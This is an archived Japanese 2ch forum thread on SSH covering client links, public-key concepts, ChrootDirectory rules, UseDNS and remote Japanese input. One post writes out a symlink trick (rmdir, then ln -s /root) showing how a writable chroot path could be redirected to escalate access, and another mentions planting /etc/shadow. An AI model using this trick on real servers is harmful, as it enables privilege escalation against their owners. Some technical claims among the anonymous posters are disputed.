◎正当な理由による書き込みの削除について:      生島英之とみられる方へ:

SSH その8YouTube動画>1本 ->画像>1枚


動画、画像抽出 || この掲示板へ 類似スレ 掲示板一覧 人気スレ 動画人気順

このスレへの固定リンク: http://5chb.net/r/unix/1398419457/
ヒント:5chスレのurlに http://xxxx.5chb.net/xxxx のようにbを入れるだけでここでスレ保存、閲覧できます。

1名無しさん@お腹いっぱい。2014/04/25(金) 18:50:57.67

2名無しさん@お腹いっぱい。2014/04/25(金) 18:51:52.35
よくある質問

Q.公開鍵認証などは使用せず、パスワードによる認証を行う場合でも
 そのパスワードは暗号化されているのですか?
A.はい、その通りです。
 SSHプロトコルでは、まず始めにサーバ<->クライアント間で
 暗号化された通信路を確立します。
 ユーザ認証はその暗号化通信路の上で行なわれるので、
 パスワードなどもちゃんと秘匿されています。

Q.最近、root,test,admin,guest,userなどのユーザ名で
 ログインを試みる輩がいるのですが?
A.sshdにアタックするツールが出回っているようです。
 各サイトのポリシーに従って、適切な制限をかけましょう。
 参考:http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/connect24h/2004.08/msg00030.html

3名無しさん@お腹いっぱい。2014/04/25(金) 18:52:32.28
◇実装
本家ssh.com
 http://www.ssh.com/ / http://www.jp.ssh.com/ (日本語)
OpenSSH
 http://www.openssh.com/ / http://www.openssh.com/ja/ (日本語)
 OpenSSH情報:http://www.unixuser.org/~haruyama/security/openssh/
 日本語マニュアル:http://www.unixuser.org/~euske/doc/openssh/jman/
 OpenSSH-HOWTO:http://www.momonga-linux.org/docs/OpenSSH-HOWTO/ja/index.html
TeraTerm/TTSSH
 http://hp.vector.co.jp/authors/VA002416/
 http://www.sakurachan.org/soft/teraterm-j/ttssh/ (日本語版)
 http://sleep.mat-yan.jp/~yutaka/windows/ / http://ttssh2.sourceforge.jp/ (Yutaka氏によるUTF-8対応版,SSH2対応版)
PuTTY
 http://www.chiark.greenend.org.uk/~sgtatham/putty/
http://pc8.2ch.net/test/read.cgi/unix/1084686527/
 http://hp.vector.co.jp/authors/VA024651/ (hdk氏による日本語パッチ)
 http://yebisuya.dip.jp/Software/PuTTY/ (蛭子屋氏による各種パッチ)
VeraTerm
 http://www.routrek.co.jp/product/varaterm/
MacSSH/SFTP
 http://pro.wanadoo.fr/chombier/
PortForwarder
 http://www.fuji-climb.org/pf/JP/
TRAMP
 http://www.nongnu.org/tramp/tramp_ja.html

4名無しさん@お腹いっぱい。2014/04/25(金) 18:53:55.41
◇規格等
 ・RFC4250: The Secure Shell (SSH) Protocol Assigned Numbers
 ・RFC4251: The Secure Shell (SSH) Protocol Architecture
 ・RFC4252: The Secure Shell (SSH) Authentication Protocol
 ・RFC4253: The Secure Shell (SSH) Transport Layer Protocol
 ・RFC4254: The Secure Shell (SSH) Connection Protocol
 ・RFC4255: Using DNS to Securely Publish Secure Shell (SSH)
  Key Fingerprints
 ・RFC4256: Generic Message Exchange Authentication for the Secure
  Shell Protocol (SSH)
WideのSSH解説
 http://www.soi.wide.ad.jp/class/20000009/slides/12/

5名無しさん@お腹いっぱい。2014/04/25(金) 22:45:40.10
リンクは修正したほうがいいかもしれないね。

OpenSSH
http://www.openssh.com/ja/ (日本語) ← 無くなってる
 http://www.jp.openbsd.org/openssh/ が日本語ページらしいが、実際は英語。


TeraTerm/TTSSH
 http://sleep.mat-yan.jp/~yutaka/windows/ ← 無くなってる
/ http://ttssh2.sourceforge.jp/ (Yutaka氏によるUTF-8対応版,SSH2対応版)

PuTTY
http://pc8.2ch.net/test/read.cgi/unix/1084686527/
 → 現行スレ Putty その3 【パティ】http://toro.2ch.net/test/read.cgi/unix/1302006799/


VeraTerm
 → Poderosaに名称変更 http://sourceforge.jp/projects/sfnet_poderosa/


MacSSH/SFTP
 http://pro.wanadoo.fr/chombier/ ← 無くなってる?

PortForwarder
 http://www.fuji-climb.org/pf/JP/
  → http://toh.fuji-climb.org/pf/JP/

TRAMP
 http://www.nongnu.org/tramp/tramp_ja.html ← ページがない。
  → http://www.nongnu.org/tramp/

6名無しさん@お腹いっぱい。2014/04/25(金) 22:50:54.52
http://www.macssh.com/index-2.html
MacSSH はこれかな。
X より前の Mac OS 用っぽいから削除でもいいかと。

7名無しさん@お腹いっぱい。2014/04/25(金) 23:12:13.51
SFTPクライアントやAndroid、iPad用のクライアントも入れたらどうだろう。

SFTPクライアント
WinSCP http://winscp.net/
WinSCP 日本語情報 http://sourceforge.jp/projects/winscp/

FileZilla https://filezilla-project.org/
FileZilla 日本語情報 http://sourceforge.jp/projects/filezilla/

Android
connectbot https://code.google.com/p/connectbot/
他にもいいのがある?

iPadについてはお手上げ。

8名無しさん@お腹いっぱい。2014/04/26(土) 00:28:20.99
前スレラストはケイオス過ぎだわ

9名無しさん@お腹いっぱい。2014/04/26(土) 02:16:57.25
RLogin http://nanno.dip.jp/softlib/man/rlogin/
が入ってねーな。SFTPも使えたり結構高性能。
難点は名前がクッソ紛らわしいのと、フォント周りが使いにくい事。

10名無しさん@お腹いっぱい。2014/04/28(月) 13:35:13.60
SSH力をつけよう
http://www.slideshare.net/tohakushi/ssh-13118950
これも入れといて。

11名無しさん@お腹いっぱい。2014/04/29(火) 07:33:37.48
>>10
10ページにウソが書いてある。しれっとウソが書いてあると
その先読む気にならないよね。でも頑張って次ページに進む
と「公開鍵で制限出来る事」… ダメだこりゃ

12名無しさん@お腹いっぱい。2014/04/29(火) 10:37:01.11
>>11
どれがウソ?

13名無しさん@お腹いっぱい。2014/04/29(火) 10:52:09.04
文脈からして
秘密鍵(を格納したファイルid_rsa)
公開鍵(を格納したファイルauthorized_keys)
だろ。
スライドなんだから文脈からわかることは聴衆が補完くらいしろや。

14名無しさん@お腹いっぱい。2014/04/29(火) 11:12:49.55
>>12
秘密鍵で暗号化したものを秘密鍵で復号できないわけなくね

15名無しさん@お腹いっぱい。2014/04/29(火) 11:43:42.19
>>14
そんなこと書いてある?

16名無しさん@お腹いっぱい。2014/04/29(火) 11:44:30.96
あぁ「でのみ」って書いてあるか。
できないであってると思うけどな。

17名無しさん@お腹いっぱい。2014/04/29(火) 12:26:46.52
文脈からいってssh2の公開鍵認証について説明している。
ssh2の公開鍵認証は暗号化→復号ではなくデジタル署名→検証
RSAは署名/検証, 暗号化/復号のどちらにも利用できるが、
DSAは署名/検証は出来るが、暗号化/復号は出来ない
筆者はssh2の認証方式を理解していないと判断せざるを得ない

11ページ
誤 公開鍵で出来る事
正 公開鍵認証で出来る事

その先は読む気にならない

18名無しさん@お腹いっぱい。2014/04/29(火) 13:01:50.91
>>16
は?秘密鍵から公開鍵が得られないとでも?
そもそも秘密鍵で暗号化するっていうのがおかしいんだが。

19名無しさん@お腹いっぱい。2014/04/29(火) 13:10:53.89
>>18
> は?秘密鍵から公開鍵が得られないとでも?
得られない。中学生でも理解してる。

20名無しさん@お腹いっぱい。2014/04/29(火) 13:38:52.41
SSH-KEYGEN(1) BSD General Commands Manual SSH-KEYGEN(1)

ssh-keygen -y [-f input_keyfile]

-y This option will read a private OpenSSH format file and print an
OpenSSH public key to stdout.

21名無しさん@お腹いっぱい。2014/04/29(火) 13:54:34.66
「秘密鍵ファイル」には「秘密鍵」と「公開鍵」が格納されているので「秘密鍵ファイル」から公開鍵は得ることが出来るが
秘密鍵から公開鍵を得る事は出来ない

22名無しさん@お腹いっぱい。2014/04/29(火) 14:11:24.46
そこを峻別するんだとしたら「秘密鍵」でどうやって暗号化するの

23名無しさん@お腹いっぱい。2014/04/29(火) 14:24:19.40
さあ? 公開鍵暗号を暗号化/復号に使うと思い込んでたのはスライド書いた奴だからな
書いた奴に聞けよ

24名無しさん@お腹いっぱい。2014/04/29(火) 14:54:01.14
> 文脈からいってssh2の公開鍵認証について説明している。

そういう文脈だとわかってるやつが

> ssh2の公開鍵認証は暗号化→復号ではなくデジタル署名→検証
> RSAは署名/検証, 暗号化/復号のどちらにも利用できるが、
> DSAは署名/検証は出来るが、暗号化/復号は出来ない

みたいなずれた話を持ち出してくる意図の方がわからん。

25名無しさん@お腹いっぱい。2014/04/29(火) 15:32:39.86
スライドのコメントに書いてあげるほうが建設的じゃないか。

26名無しさん@お腹いっぱい。2014/04/29(火) 15:32:50.37
>>24
> ssh2の公開鍵認証は暗号化→復号ではなくデジタル署名→検証

27名無しさん@お腹いっぱい。2014/04/29(火) 18:25:10.11
http://www.slideshare.net/tohakushi/janog335-33679095

同じ人の新しいスライドがあるけど、こっちは端折りすぎかな。

28名無しさん@お腹いっぱい。2014/04/29(火) 18:52:39.53
>>11が決定版の資料を作ってくれればいいのよ。

29名無しさん@お腹いっぱい。2014/04/29(火) 20:25:18.10

30名無しさん@お腹いっぱい。2014/04/29(火) 21:43:15.62

31名無しさん@お腹いっぱい。2014/04/29(火) 22:42:46.64
秘密鍵と公開鍵ってのは鍵の使い方の話で、鍵の能力の話じゃないからねぇ…

>>14
暗号化に使った鍵で平文化は出来ないよ。そうでないと公開鍵暗号が成立しない。
公開鍵暗号は暗号化鍵を公開鍵として、平文化鍵を秘密鍵とする。
電子署名では暗号化鍵を秘密鍵として、平文化鍵を公開鍵とする。
暗号化鍵から平文化鍵が計算できるアルゴリズムは電子署名にしか使えず、
平文化鍵から暗号化鍵が計算できるアルゴリズムは公開鍵暗号にしか使えず、
どちらの鍵からももう一方の鍵を計算出来ないアルゴリズムはどちらにも使える。
さらに暗号化鍵と平文化鍵を入れ替える事ができる場合は単一の鍵ペアで両方できる。

秘密鍵ファイルの中に公開鍵も一緒に保存してあるか、秘密鍵から公開鍵が算出できるなら平文化できるけど、
電子署名でどちらも満たさない場合は復元できないよ。(普通は署名書として公開鍵添付するからンな事ないが)

32名無しさん@お腹いっぱい。2014/04/29(火) 23:07:45.67
>>29
ルークよ、ソースを使うのじゃ?

33名無しさん@お腹いっぱい。2014/04/30(水) 10:50:51.32

34名無しさん@お腹いっぱい。2014/04/30(水) 12:08:31.64
>>33
「公開鍵暗号を暗号化/復号に使うと思い込んでたのはスライド書いた奴だから」
スライドのどこで、それが分かる?

p10 は「秘密鍵/公開鍵」という用語を鍵ペア(データ)のどちらか一方という意味と
それをファイル(文字列)化したものという意味の二つの使い方を同じページで
使ってるのがまずいと思う。
2行目の「秘密鍵からは公開鍵が生成できる」は「いわゆる秘密鍵ファイルには
公開鍵情報も含まれているので、公開鍵情報を取り出せる」という意味だろう。
好意的に解釈すれば。

このスライドを書いた奴は分かってないはず、という見地に立てば、秘密鍵ファイルから
公開鍵を取り出せることを、秘密鍵から公開鍵が生成できると勘違いしているともとれるが。

p11の「公開鍵で制限出来ること」というタイトルに対して「公開鍵認証で出来る事」という案を出しているけど
このページの話題は openssh の sshd の実装の話(他のsshサーバーでもこうなのかどうかは知らないので
間違ってたらごめんだけど)だから、誤りというほどではないと思う。

35名無しさん@お腹いっぱい。2014/04/30(水) 14:29:27.08
用語の使い方に「怪しい」ところがある、ということなら
初心者には勧められない、ということになると思う

ちゃんと自分で解釈を脳内補完できる人には
多少の「誤解を招きかねない」表現も問題ないだろうが
件のドキュメントはそれができない人向けなんじゃ?

36名無しさん@お腹いっぱい。2014/04/30(水) 14:33:19.49
厳密に書こうとすると無闇にややこしくなっちゃって
初心者にわかりづらくなることもあるよね

37名無しさん@お腹いっぱい。2014/04/30(水) 15:09:13.09
>>34
> p10 は「秘密鍵/公開鍵」という用語を鍵ペア(データ)のどちらか一方という意味と
> それをファイル(文字列)化したものという意味の二つの使い方を同じページで
> 使ってるのがまずいと思う。
秘密鍵を格納したファイルから公開鍵を取り出す事を「秘密鍵からは公開鍵が
生成できる」と表現したのなら、公開の場で発表する能力が無いって事だ。

38名無しさん@お腹いっぱい。2014/04/30(水) 15:12:15.45
恨みでもあるの?

39名無しさん@お腹いっぱい。2014/04/30(水) 15:27:24.30
>>35
もくじを見ると件のページは、おさらいの一部になっている。
ということは自分で脳内補完できる人向けじゃないだろうか。

40名無しさん@お腹いっぱい。2014/04/30(水) 16:42:53.53
>>38
ウソを拡大再生産する輩を全部憎んでいる
死ねばいいのに

41名無しさん@お腹いっぱい。2014/04/30(水) 16:54:30.43
間違いは正しましょう。
人は許しましょう。

42名無しさん@お腹いっぱい。2014/04/30(水) 16:58:36.41

43名無しさん@お腹いっぱい。2014/04/30(水) 17:33:31.79
>>42
じゃ、お前が教えてやれ。俺は叩く。

44名無しさん@お腹いっぱい。2014/04/30(水) 17:41:08.48
>>43
おれは君ほど知識ないから。

45名無しさん@お腹いっぱい。2014/04/30(水) 19:43:47.34
コメントなりtwitterなりで指摘しないと
ここで叩いても気づかないんじゃないかな?
個人的には叩くほどのことじゃない気はする

46名無しさん@お腹いっぱい。2014/04/30(水) 20:27:46.58
アカウントないのでコメントできません。

47名無しさん@お腹いっぱい。2014/04/30(水) 21:26:15.15
作ればいいのよ。

48名無しさん@お腹いっぱい。2014/04/30(水) 22:16:54.82
>>47
それがイヤだから2chにいるの

49名無しさん@お腹いっぱい。2014/04/30(水) 23:25:32.54
RSAの場合、2つの素数p, q(p≠q)に対し(p,q)を秘密鍵, pqを公開鍵にするのだから秘密鍵から公開鍵を生成するのは簡単だよね?

50名無しさん@お腹いっぱい。2014/05/01(木) 00:08:19.46
>>49
id_rsaにmodules nとpublicExponent eが含まれてるから。


RFC 3447 PKCS #1: RSA Cryptography Specifications February 2003


A.1.2 RSA private key syntax

An RSA private key should be represented with the ASN.1 type
RSAPrivateKey:

RSAPrivateKey ::= SEQUENCE {
version Version,
modulus INTEGER, -- n
publicExponent INTEGER, -- e
privateExponent INTEGER, -- d
prime1 INTEGER, -- p
prime2 INTEGER, -- q
exponent1 INTEGER, -- d mod (p-1)
exponent2 INTEGER, -- d mod (q-1)
coefficient INTEGER, -- (inverse of q) mod p
otherPrimeInfos OtherPrimeInfos OPTIONAL
}

51名無しさん@お腹いっぱい。2014/05/01(木) 16:45:46.77
いつまでこの話題引っ張るの?

52名無しさん@お腹いっぱい。2014/05/01(木) 16:49:20.51
>>11があきらめるまで。

53名無しさん@お腹いっぱい。2014/05/01(木) 19:52:54.74
引っ張ってるのはオレじゃない。必死でSSH力を擁護してる誰か。

54名無しさん@お腹いっぱい。2014/05/01(木) 21:06:13.64
それに反応してるなら同罪。

55名無しさん@お腹いっぱい。2014/05/01(木) 23:32:05.54
賢者timeな者だけが石を投げなさい(冗談

sshに限らず、ツールの100%も使いこなせていないなー

56名無しさん@お腹いっぱい。2014/05/01(木) 23:47:20.91
OpenSSHのsshd_configでChrootDirectoryを指定することってあるよね。
そのディレクトリに、
All components of the pathname must be root-owned directories that are not writable by any other user or group.
こういう制限があるけど、ナンデ?

57552014/05/01(木) 23:54:48.41
特権分離では?

58名無しさん@お腹いっぱい。2014/05/02(金) 00:24:56.67
>>56
rootの設定と関係なしにlnとかで好きな場所に出来てしまうからじゃ?

59名無しさん@お腹いっぱい。2014/05/02(金) 01:28:27.26
ChrootDirectoryの親まではroot-ownedでroot以外not writableという制限は分かるような気がするんだけど、
例えば、chroot先を/home/oresama/ に指定するとき oresama がroot以外not writableになってると
oresamaは自分のホームディレクトリのはずなのにディレクトリもファイルも作れない。
ちょっと厳しくないかと思う。

60名無しさん@お腹いっぱい。2014/05/02(金) 01:37:37.96
>>58
「あのぉ、root先輩、ChrootDirectoryを /home/watashi/dakeno/himitsu/ にしてもらえませんかぁ。」って頼んで
「おっふ、やっといた」となったら
rmdir /home/watashi/dakeno/himitsu
ln -s /root /home/watashi/dakeno/himitsu
「計画通〜り」ってことだよね。
このためには/home/watashi/dakeno がwritableでなければ出来ないでしょ。
himitsu は writableでもかまわないんじゃないだろうか。

61名無しさん@お腹いっぱい。2014/05/02(金) 02:16:52.55
>>60
Chrootにつっこまれる他のユーザを騙すことはできるようになるな

62名無しさん@お腹いっぱい。2014/05/02(金) 08:37:42.29
>>59
/etc/shadowとか自由に作れるがそれでいいのか?

63名無しさん@お腹いっぱい。2014/05/02(金) 11:33:29.13
そっか、mv して新しく作ることが可能になるのか。
いくない。それは、いくないな。

64名無しさん@お腹いっぱい。2014/05/02(金) 13:58:00.45
>>59
あんま詳しくないけど、chroot先とホームディレクトリは別々じゃなかったけ?

65名無しさん@お腹いっぱい。2014/05/02(金) 14:16:39.82
OpenSSH No Longer Has To Depend On OpenSSL - Slashdot
http://beta.slashdot.org/story/201419

試してみたい

66名無しさん@お腹いっぱい。2014/06/01(日) 20:18:44.75
VPN経由でSSHって使えないの?

67名無しさん@お腹いっぱい。2014/06/01(日) 23:32:48.58
>>66
何か使えない理由ある?

68名無しさん@お腹いっぱい。2014/06/02(月) 02:05:58.72
宗教上の理由とか。

69名無しさん@お腹いっぱい。2014/06/02(月) 08:26:24.30
中国とかは法律的な理由もあるかも
暗号化通信は当局が解読可能な状態にしないと駄目なんだっけ?
VPN張る事自体問題視されるとか聞いたことあるけど

70名無しさん@お腹いっぱい。2014/06/02(月) 09:52:55.95
それ>>66とは別の話だよね。

71名無しさん@お腹いっぱい。2014/09/14(日) 17:08:34.71
今SSHについて勉強してます。
どなたかRSA1、RSA、DSAの違いにつ
いて教えて頂けませんか?

メリット、デメリットがわからず、どれを使って良いのかわかりません。

自分で調べろやは無しでお願いします。

72名無しさん@お腹いっぱい。2014/09/14(日) 17:09:54.63
挿入ネタはいいです

73名無しさん@お腹いっぱい。2014/09/14(日) 17:17:26.72
挿入ねたって?

74名無しさん@お腹いっぱい。2014/09/14(日) 19:08:03.88
>>71
shでも学んでろ。

532 名無しさん@お腹いっぱい。 sage 2014/09/14(日) 17:11:01.54
今シェルについて勉強してます。
どなたかash、bsh、cshの違いにつ
いて教えて頂けませんか?

メリット、デメリットがわからず、どれを使って良いのかわかりません。

自分で調べろやは無しでお願いします。

75名無しさん@お腹いっぱい。2014/09/14(日) 19:22:24.51
>>74
なに(笑
このコピペみたいなカキコは!(笑)

お、俺じゃないんだからね

76名無しさん@お腹いっぱい。2014/09/17(水) 05:52:02.33
みたいなじゃなくて改変コピペそのもの
こんなつまらんことを時々思い出したかのように繰り返してる狂人だからスルー推奨

77名無しさん@お腹いっぱい。2014/09/17(水) 06:35:04.81
改変コピペ上等。全力で釣られるのが真の漢

78名無しさん@お腹いっぱい。2014/09/17(水) 10:46:58.43
基地外本人乙

79名無しさん@お腹いっぱい。2014/10/10(金) 08:24:44.85
# netstat -n | grep 22
したら、知らないホストでESTABLISHED接続になってて
# cat /var/log/secure| grep 知らないホスト(ロボット?)
から複数のアタックがあったのだけど、session openってログ無かったんですが、
ssh のセッションがESTABLISHEDになることってあるのでしょうか?

80名無しさん@お腹いっぱい。2014/10/10(金) 08:59:26.03
catが無駄です

81名無しさん@お腹いっぱい。2014/10/10(金) 11:44:06.96
>>79
あります

82名無しさん@お腹いっぱい。2014/10/10(金) 11:54:05.56
>>79
tcpのセッションとsshのセッションを分けて考えないと。

83名無しさん@お腹いっぱい。2014/10/10(金) 13:28:43.78
>>81, >>82
ありがとうございます。

/var/log/secureでsession openになってないので気にしなくていいのですね。
ポートNo変えようかなーと思ってます。

84名無しさん@お腹いっぱい。2014/10/11(土) 09:48:05.32
>83 なんなら log をverbose にして暫く見張る。ま、port 番号変えるほうが対策になるけど。

85名無しさん@お腹いっぱい。2014/10/11(土) 16:18:08.65
秘密鍵使ってて、sshポートのハッキングなんてあるえるのでしょうか。

86名無しさん@お腹いっぱい。2014/10/11(土) 17:07:57.77
>>85
マスコミじゃないんだからクラッキングとか攻撃とか呼ぼうぜ。
回答:sshd自体に脆弱性があれば普通に吹っ飛ばされるよ。
http://jvndb.jvn.jp/ja/contents/2008/JVNDB-2008-002571.html
http://jvndb.jvn.jp/ja/contents/2008/JVNDB-2008-002570.html
http://jvndb.jvn.jp/ja/contents/2006/JVNDB-2006-000763.html
http://jvndb.jvn.jp/ja/contents/2003/JVNDB-2003-000274.html

87名無しさん@お腹いっぱい。2014/10/11(土) 18:17:34.19
>>85
パスワード認証許可してないかノックしてるんだろ。

88名無しさん@お腹いっぱい。2014/10/11(土) 19:05:26.71
>>85 とある共用鯖で、アホな鯖管がルート奪取脆弱性ありのカーネル放置していて、これまたよく分かってないユーザが、何人も公開鍵、秘密鍵を一遍に取られてえらいことになった、つう事案があったよ。

89名無しさん@お腹いっぱい。2014/10/11(土) 21:33:37.26
「公開鍵を送ってくれ」と言ったら
秘密鍵も送ってくるユーザーの多いこと多いこと。

90名無しさん@お腹いっぱい。2014/10/13(月) 00:01:52.96
そういうのは9割が中国からだから、
http://freetibet.org/about/human-rights-tibet
の中身を返すようにしてる

91名無しさん@お腹いっぱい。2014/10/13(月) 16:13:39.16
>>90
coolですな。

92名無しさん@お腹いっぱい。2014/10/14(火) 04:44:30.79
TCPラッパーが使えなくなると地味に困るなあ・・・
なんでサポート切っちゃうんでしょうか

93名無しさん@お腹いっぱい。2014/10/14(火) 17:23:56.12
もしかしたら ifconfig みたいにメンテナがいないからじゃない?
ftp 覗いてみたら tcp_wrappers_7.6.tar.gz のタイムスタンプは Apr 8 1997 だった

94名無しさん@お腹いっぱい。2014/10/14(火) 17:28:46.50
sshd -iでinetdから上げるようにしてinetdのtcpwrapperを使うかね

95名無しさん@お腹いっぱい。2014/10/14(火) 17:54:06.39
inetdサポートもそのうち削られそうだ

96名無しさん@お腹いっぱい。2014/10/14(火) 19:42:41.99
sshd_configのMatch AddressとDenyUsers, AllowUsersあたりでかわりにがんばれってことかなぁ
とりあえずはpf.confでやるけど

97名無しさん@お腹いっぱい。2014/10/14(火) 19:43:18.68
リロードめんどいな

98名無しさん@お腹いっぱい。2014/10/14(火) 19:47:07.53
PAMでやれ、ってことかな。
pam_accessとかpam_login_accessとか。

99名無しさん@お腹いっぱい。2014/10/14(火) 19:59:17.14

100名無しさん@お腹いっぱい。2014/10/18(土) 10:07:44.17
誰か知ってたら教えて欲しいんだけど、UseDNSって何のために存在しているの?

manとか見るとクライアントのIPから逆引きでホスト名を確認して
IPアドレスとホスト名のマッピングが出来なかったら接続を許可しないって動きの
ようにみえるんだけど…

この辺の詳しい動きがよくわからん

101名無しさん@お腹いっぱい。2014/10/18(土) 11:02:42.57
「逆引きまともに設定してないやつらなんて信用できるか!」
って人のために存在している。

102名無しさん@お腹いっぱい。2014/10/18(土) 11:03:43.55
クライアントの IP アドレスを逆引きしてホスト名を得る
→そのホスト名を正引きして IP アドレスを得る
→その IP アドレスが元のと一致してなかったら蹴る

103名無しさん@お腹いっぱい。2014/10/18(土) 11:42:47.38
そんなごく当たり前のIP逆引きチェックそのものを質問してるわけない、
質問の意図は別のところにある、と見るべき引っかけ問題。

104名無しさん@お腹いっぱい。2014/10/18(土) 12:39:10.85
んじゃどんな意図なんだろ

105名無しさん@お腹いっぱい。2014/10/18(土) 12:52:20.85
UseDNSをnoにすることってないのになぜオプションがあるのか、という質問?
IP解決はDNSとは限らない(NISとかhostsとか)のになぜDNSという設定名?

106名無しさん@お腹いっぱい。2014/10/18(土) 12:55:17.30
逆引き出来ないクライアントから接続しているユーザーからの
「なんかログインに時間かかるんだけど」というクレームに
対応するため、逆引きをしないようにする機能だろ。

107名無しさん@お腹いっぱい。2014/10/18(土) 12:59:58.93
「それは逆引き設定しろ」と言えば済む話で、sshdの設定を変えるべきではない。

108名無しさん@お腹いっぱい。2014/10/18(土) 13:08:08.17
>>107
そう思う人はそうすればいい。

109名無しさん@お腹いっぱい。2014/10/18(土) 13:12:02.82
釣りだったか。

110名無しさん@お腹いっぱい。2014/10/18(土) 13:13:29.54
1ユーザーの逆引き無視要求で、全ユーザーの逆引きチェックを無効(危険)に晒すなんて、、

111名無しさん@お腹いっぱい。2014/10/18(土) 13:25:57.51
逆引きチェックしてもあんまり意味ないと思う。

112名無しさん@お腹いっぱい。2014/10/18(土) 13:47:55.43
ごめん、言葉が足らなかった。

このUseDNS、デフォルトだとYesになっていると思うんだけど、クライアントが逆引き出来ない状態
(DNSサーバへの接続が出来ない状態やそもそもレコードにIPが登録されていない状態)でもSSHって接続出来るじゃない?

だとしたら、どういう時に使えるの?と思って。

 1.IPアドレスがDNSに登録されている状態
  かつ
 2.そのホスト名を再度正引きしたら違うIPアドレスになっている

上みたいな状態の時だけは接続させないって認識であってるのかな?
レコードにいなかったり、DNSに接続出来ない時はそのままSSH接続出来るって事はわかるんだけど…

113名無しさん@お腹いっぱい。2014/10/18(土) 17:52:52.87
rhosts認証を突破されないためのオプションだよ。

114名無しさん@お腹いっぱい。2014/10/18(土) 20:43:50.93
>>113
rhosts認証って、sshd_configのデフォルト設定だと有効になっていないよね?
てことは、sshd_configがデフォルトの状態のまま利用されていたら、このオプションでやってくれることってログの記録時にホスト名でロギングしてくれるくらいって
認識であっているかな?

他の何か利用用途ってあります?

115名無しさん@お腹いっぱい。2014/10/18(土) 23:12:07.86
ホスト名でMatchさせてる場合

116名無しさん@お腹いっぱい。2014/10/19(日) 08:28:25.46
考えてもしょうがないからさっさとnoにしちゃえよ

117名無しさん@お腹いっぱい。2014/10/19(日) 15:35:56.74
>>116
> 考えてもしょうがないからさっさとnoにしちゃえよ
インシデントになったせいで、会議で説明しなきゃならないんだよ

118名無しさん@お腹いっぱい。2014/10/19(日) 16:35:04.00
自分がやるべきことを掲示板に丸投げしてドヤ顔かよw

119名無しさん@お腹いっぱい。2014/10/19(日) 19:45:24.65
ウソ教えられて、会議でそれを突っ込まれたら、2chで聞いたと言い訳するのかな?

120名無しさん@お腹いっぱい。2014/10/19(日) 20:27:25.16
>>118
>>119
とはいっても、サポートよりここの住人の方が詳しいし頼りになるし…
教えてもらった情報を元に海外のサイトとサポートで裏取しようと思ってたんだ

仕様の部分がもうよくわからなくて…

121名無しさん@お腹いっぱい。2014/10/19(日) 22:46:30.26
もうソース読んだ方が早いし確実じゃね。

122名無しさん@お腹いっぱい。2014/10/19(日) 23:12:00.13
かまってもらえるのは回答者にとって興味がある場合だけ

123名無しさん@お腹いっぱい。2014/10/20(月) 02:45:14.37
>>120
ホスト名で認証しない限りUseDNSはNoでいい。
今時IgnoreRhostsがnoになってることはないだろ。
デフォルトはrsh引きずってるだけ。

124名無しさん@お腹いっぱい。2014/10/20(月) 14:33:56.81
かまうと調子こいてソースは?とかエビデンスは?とか言い始めるぞw

125名無しさん@お腹いっぱい。2014/10/20(月) 14:34:29.62
なら>>121でよし。

126名無しさん@お腹いっぱい。2014/10/21(火) 17:09:45.04
というわけで、このスレでのSSHに関する情報交換は全面禁止となりました。

127名無しさん@お腹いっぱい。2014/10/21(火) 18:21:36.12
ログインシェルをsshに変えたいんですが、chshでやろうとするとエラーになります。
どうすればいいですか?

128名無しさん@お腹いっぱい。2014/10/21(火) 18:33:44.06
まずはその屏風からsshとかいうシェルを出してみてください

129名無しさん@お腹いっぱい。2014/10/21(火) 18:38:38.21
sshはすでにインストール済みで、動作確認済みです

130名無しさん@お腹いっぱい。2014/10/21(火) 18:45:40.37
>>127
>>129
出来ません、出来ません。
SSHにはそんなこと出来ません。

131名無しさん@お腹いっぱい。2014/10/21(火) 19:11:18.03
>>127
/etc/shellsにないんじゃないか。
ログインできなくなってもしらんけど。

132名無しさん@お腹いっぱい。2014/10/21(火) 19:24:07.55
/etc/shellsですか、ありがとうございます。
今環境がないので明日、客先で試してみます。

133名無しさん@お腹いっぱい。2014/10/21(火) 19:32:19.94
加齢臭コピペがくさいです

134名無しさん@お腹いっぱい。2014/10/21(火) 19:33:29.40
>>126
× このスレでのSSHに関する情報交換は全面禁止となりました
○ このスレでのSSHに関するサポート乞食は全面禁止となりました

135名無しさん@お腹いっぱい。2014/10/26(日) 13:36:46.74
その後 132 の姿を見る者は居なかった

136名無しさん@お腹いっぱい。2014/10/26(日) 21:06:55.48
132=129=127なのか、ネタレスだったのかはしらんけど、
本気でそれを客先でやったらとんでも無い事にはなるだろうなぁ…

sudoも出来ない状況だと、hddを別のに刺して直すしか思いつかん。

137名無しさん@お腹いっぱい。2014/10/26(日) 21:30:38.39
いつもの改変コピペ君だよ

138名無しさん@お腹いっぱい。2014/10/27(月) 14:20:34.23
UNIX板には死語レベルのコピペにマジレスするピュア()な中高年が多いですね

139名無しさん@お腹いっぱい。2014/11/23(日) 17:53:17.21
SSH で接続すると、日本語入力ができなくなるのだが、、これって無理なの?

Cygwin → LinuxMint
LinuxMint → LinuxMint(別ユーザー)

ターミナル または 、ssh -X で手元に表示したアプリでも日本語入力できない。
LinuxMint単独だと、 Mozcとかで日本語入力できてるんだけど。

140名無しさん@お腹いっぱい。2014/11/24(月) 04:27:36.36
普通はできるだろ…とりあえず文字コード合ってる?

141名無しさん@お腹いっぱい。2014/11/24(月) 04:36:11.60
できないじゃなくて、どうなるか書かないと。

142名無しさん@お腹いっぱい。2014/11/24(月) 05:16:14.38
>>139
この場合日本語入力はローカル側のが使われるんだよ。sshログイン先のホストのものではない。
必要な環境変数が設定されてないとエスパー。

143名無しさん@お腹いっぱい。2014/11/29(土) 18:39:05.96
>139-142

失礼しやした。

結論から言うと、リモート先で、
export XMODIFIERS="@im=fcitx"
と入力することによって、
GUIアプリ(Firefoxとかgvim)でも、日本語入力(Mozc)ができるようになりました。

で、後は、この export 文を設定ファイルで自動読み込みさせたい。
.bashrc に書くのはイマイチだし、
かといって、.ssh/rc に 書くと、
今度は、sshが、 xauth を読まなくなる。

これについては、
SSHのマニュアルか
http://www.unixuser.org/~euske/doc/openssh/jman/sshd.html
個人ページ
http://namazu.org/~tsuchiya/ssh/
http://uncorrelated.no-ip.com/20101225.shtml
を参考に対処できそう。

1441432014/11/29(土) 21:40:37.22
自己レス

>>143

LinuxMint→LinuxMint へ、ssh -X でリモートログインした場合、
export XMODIFIERS="@im=fcitx"
すれば、gvim等のGUIアプリでも日本語入力のインターフェースが使えた。
だけど、~/.ssh/rc に記述すると xauth関連が良く分からないのであきらめ。
おとなしく、exportを手打ちするか、source することにした。

それから、
